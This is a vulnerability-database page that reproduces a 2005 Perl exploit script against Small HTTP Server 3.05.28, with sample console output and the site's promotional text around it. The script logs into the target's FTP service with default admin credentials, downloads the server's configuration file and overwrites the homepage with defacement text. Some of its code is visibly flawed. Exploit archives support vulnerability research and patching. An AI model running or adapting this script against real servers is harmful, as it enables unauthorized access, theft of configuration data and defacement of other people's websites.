Vulners
Lucene search
Small HTTP Server <= 3.05.28 Arbitrary Data Execution Exploit
#!/usr/bin/perl
#
# sHTTP FTPServer Abritary Data Execution Exploit
# --------------------------------------------------
# Infam0us Gr0up - Securiti Research
#
#
# E:\PERL>perl shttp.pl localhost C:\shttps
#
# [?] Version: libwww-perl-5.76
# [+] Connect to localhost...
# [+] Connected
# [+] Send user and pass..
# [+] Logged in!
# [+] Directory List:
#
# . | 0
# .. | 0
# uninst.exe | 3072
# http.exe | 78848
# desc.htm | 42788
# license.txt | 1804
# http.cfg | 1616
# www | 0
# 1.txt | 41
#
# [+] Getting FTP config..[OK]
# [+] Backup target file..[OK]
# [+] Set homepage defacement..[DONE]
# [*] 0wned!
#
# Tested on Windows2000 SP4 (Win NT)
# info: infamous.2hell.com
#
use LWP;
$subject = "sHTTP FTPServer Abritary Data Execution Exploit";
$vers = "Small HTTP server 3.05.28";
$vendor = "http://srv.mf.inc.ru";
$codz = "basher13 - basher13(at)linuxmail.org";
if(@ARGV!=2){
print "\n";
print " $subject\n";
print "-------------------------------------------------\n\n";
print "Usage: $0 [remote IP] [dir_path] \n";
print "Exam: $0 127.0.0.1 c:\\shttps \n\n";
exit;
}
use Net::FTP;
use IO::Dir;
use Tk;
$target = $ARGV[0];
$path = $ARGV[1];
# Modify $text to changes the default homepage
$text = "[title]PENETRATION TEST[/title]Subject: $subject[br]Version: $vers[br]URL: $vendor[br]Coders: $codz";
my $user = "admin"; # Changes USER to own feed
my $pass = "ftp"; # Changes PASS to own feed
$cols=1000000;
print "\n";
print "-------------------------------------------------------\n";
print "[?] Version: libwww-perl-$LWP::VERSION\n";
sleep(2);
print "[+] Connect to $target...\n";
$ftp = Net::FTP->new($target, Debug => 0, Port => 21) || die "could not
connect: $!";
print "[+] Connected\n";
print "[+] Send user and pass..\n";
$ftp->login($user, $pass) || die "could not login: $!";
sleep(1);
print "[+] Logged in!\n";
print "[+] Directory List: \n\n";
sleep(2);
tie %dir, IO::Dir, $path;
foreach (keys %dir) {
print $_, " | " , $dir{$_}->size,"\n";
}
print "\n";
print "[+] Getting FTP config..";
sleep(1);
$ftp->get("http.cfg")
or die "Get failed ", $ftp->message;
print "[OK]\n";
print "[+] Backup target file..";
sleep(2);
$dirpath = "$path\\www\\index.htm";
$lama = $dirpath;
$baru = "$dirpath.BAK.$$(basher13)";
open(OLD, "< $lama") or die "FAILED to open $lama\n[-] Reason: Try on another place..\n";
open(NEW, "> $baru") or die "can't open $baru: $!\n";
while () {
s/\b(p)earl\b/${1}erl/i;
(print NEW $_) or die "FAILED to write to $baru\n[-] Reason: Server has secure permission\n";
}
close(OLD) or die "FAILED to close $lama\n";
close(NEW) or die "can't close $baru\n";
print "[OK]\n";
print "[+] Set homepage defacement..";
sleep(2);
open(OUT, ">$dirpath") or die("unable to open $dirpath: $!");
open FH, ">$dirpath";
print FH "$text";
print "[DONE]\n";
close FH;
print "[*] 0wned!\n";
$ftp->quit;
print "-------------------------------------------------------\n";
my $mw = MainWindow->new(-title => 'INFO',);
my $var;
my $opt = $mw->Optionmenu(
-options => [qw()],
-command => sub { print "\n[>]: ", shift, "\n" },
-variable => \$var,
)->pack;
$opt->addOptions([- Subject=>$subject],[- Version=>$vers],[- Vendor=>$vendor],[- Coder=>$codz]);
$mw->Button(-text=>'CLOSE', -command=>sub{$mw->destroy})->pack;
MainLoop;
# sebug.net
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
15 Jul 2005 00:00Current
7.1High risk
Vulners AI Score7.1